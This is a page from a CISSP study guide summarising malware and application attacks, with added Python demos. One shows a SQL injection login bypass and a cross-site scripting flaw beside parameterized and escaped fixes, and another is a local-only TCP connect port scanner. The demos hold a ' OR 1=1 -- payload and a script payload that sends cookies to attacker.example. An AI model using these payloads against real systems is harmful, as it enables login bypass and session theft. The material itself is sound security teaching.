Page 1497 - (ISC)² CISSP Certified Information Systems Security Professional Official Study Guide
Summary
Application developers have a lot to worry about! As attackers become
more sophisticated in their tools and techniques, the Application layer
is increasingly the focus of their attacks because of its complexity
and its many points of vulnerability.
Malicious code, including viruses, worms, Trojan horses, and logic
bombs, exploits vulnerabilities in applications and operating systems
or uses social engineering to infect systems and gain access to their
resources and confidential information.
Applications themselves may also contain a number of vulnerabilities.
Buffer overflow attacks exploit code that fails to check the length of
its input against the size of the buffer that receives it, allowing an
attacker to overwrite adjacent memory and, in the worst case, redirect
execution. Back doors give former developers and malicious code
authors a way to bypass normal authentication and access controls.
Rootkits are typically packaged exploits that give attackers an easy
way to escalate their privileges and then conceal their presence on the
compromised system.
Many applications are moving to the web, creating a new level of
exposure and vulnerability. Cross-site scripting attacks inject script
into pages served by a trusted site so that it runs in other users'
browsers, where it can steal session tokens or trick users into handing
sensitive information to a site the attacker controls. SQL injection
attacks smuggle SQL syntax through unvalidated input fields to bypass
application controls and directly read or manipulate the underlying
database.
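The following is an added example, not code from the study guide, that shows the two web attacks described above side by side with their fixes: a login check that builds its SQL by string formatting (bypassed with a classic `' OR 1=1 --` payload) beside a parameterized version, and a greeting page that interpolates a name into HTML unescaped beside one that escapes it. The user table, the account `alice`, and the payload strings are constructed sample data for the demonstration.

```python
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """Create an in-memory users table with one constructed sample account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # The query text is assembled with string formatting, so anything the
    # user types is parsed by the database as SQL syntax, not as a value.
    query = (
        f"SELECT COUNT(*) FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    return conn.execute(query).fetchone()[0] > 0


def login_hardened(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Placeholders bind the values separately from the statement; the driver
    # never interprets the contents of username or password as SQL.
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0


def render_greeting_vulnerable(name: str) -> str:
    # Untrusted input dropped straight into the page: a <script> tag in the
    # name is sent to every browser that renders this response.
    return f"<p>Welcome, {name}</p>"


def render_greeting_hardened(name: str) -> str:
    # Escape for the HTML text context (quote=True also covers attributes)
    # so the browser displays the payload as text instead of executing it.
    return f"<p>Welcome, {html.escape(name, quote=True)}</p>"


# Constructed attack inputs used by the demonstration below.
SQLI_PAYLOAD = "' OR 1=1 --"   # closes the string, forces a true clause, comments out the rest
XSS_PAYLOAD = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable login with payload:", login_vulnerable(conn, SQLI_PAYLOAD, "wrong"))
    print("hardened login with payload:  ", login_hardened(conn, SQLI_PAYLOAD, "wrong"))
    print("hardened login, real creds:   ", login_hardened(conn, "alice", "correct horse"))
    print(render_greeting_vulnerable(XSS_PAYLOAD))
    print(render_greeting_hardened(XSS_PAYLOAD))
```

The injected string turns the vulnerable query into `... WHERE username = '' OR 1=1 --' AND password = 'wrong'`; the `--` comment discards the password check entirely, which is why the password value no longer matters. With bound parameters the same string is simply compared, character for character, against the stored username and fails.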
Reconnaissance tools automate the identification of vulnerable systems
that may be attacked at a later date. IP probes (ping sweeps), port
scans, and vulnerability scans are successive, increasingly detailed
ways of locating weak points in an organization's security controls:
first which hosts are alive, then which services they expose, then
which of those services carry known flaws.
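As an added illustration of the port-scan step (not from the study guide), the block below implements a minimal TCP connect scan: it attempts a full handshake on each port and reports the ones that accept. To stay self-contained it stands up its own listening socket on 127.0.0.1 on an OS-chosen port to play the role of an exposed service; the host address, port list, and timeout are assumptions for the demonstration.

```python
import socket
from typing import Iterable, List, Tuple


def start_listener(host: str = "127.0.0.1") -> Tuple[socket.socket, int]:
    """Open a local listening socket on an OS-assigned port (stands in for a live service)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))          # port 0 lets the OS pick a free port
    srv.listen(5)                # the kernel completes handshakes into the backlog
    return srv, srv.getsockname()[1]


def tcp_connect_scan(host: str, ports: Iterable[int], timeout: float = 0.5) -> List[int]:
    """Return the subset of ports on host that complete a TCP three-way handshake.

    This is the noisiest scan type: every probe is a full connection that the
    target's service and logs will see, unlike a SYN (half-open) scan.
    """
    open_ports: List[int] = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 on success and an errno (e.g. ECONNREFUSED)
            # instead of raising, which keeps the scan loop simple.
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports


if __name__ == "__main__":
    srv, live_port = start_listener()
    try:
        # Scan a small window around the live port; the neighbours will
        # normally be closed, so only live_port should be reported.
        window = range(max(1, live_port - 2), live_port + 3)
        print("open ports:", tcp_connect_scan("127.0.0.1", window))
    finally:
        srv.close()
```

A defender sees this scan as a burst of short-lived connections from one source across many ports; that pattern, rather than any single connection, is what port-scan detection rules key on.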
Masquerading attacks, such as IP spoofing and session hijacking, allow
an attacker to impersonate a legitimate user or system.

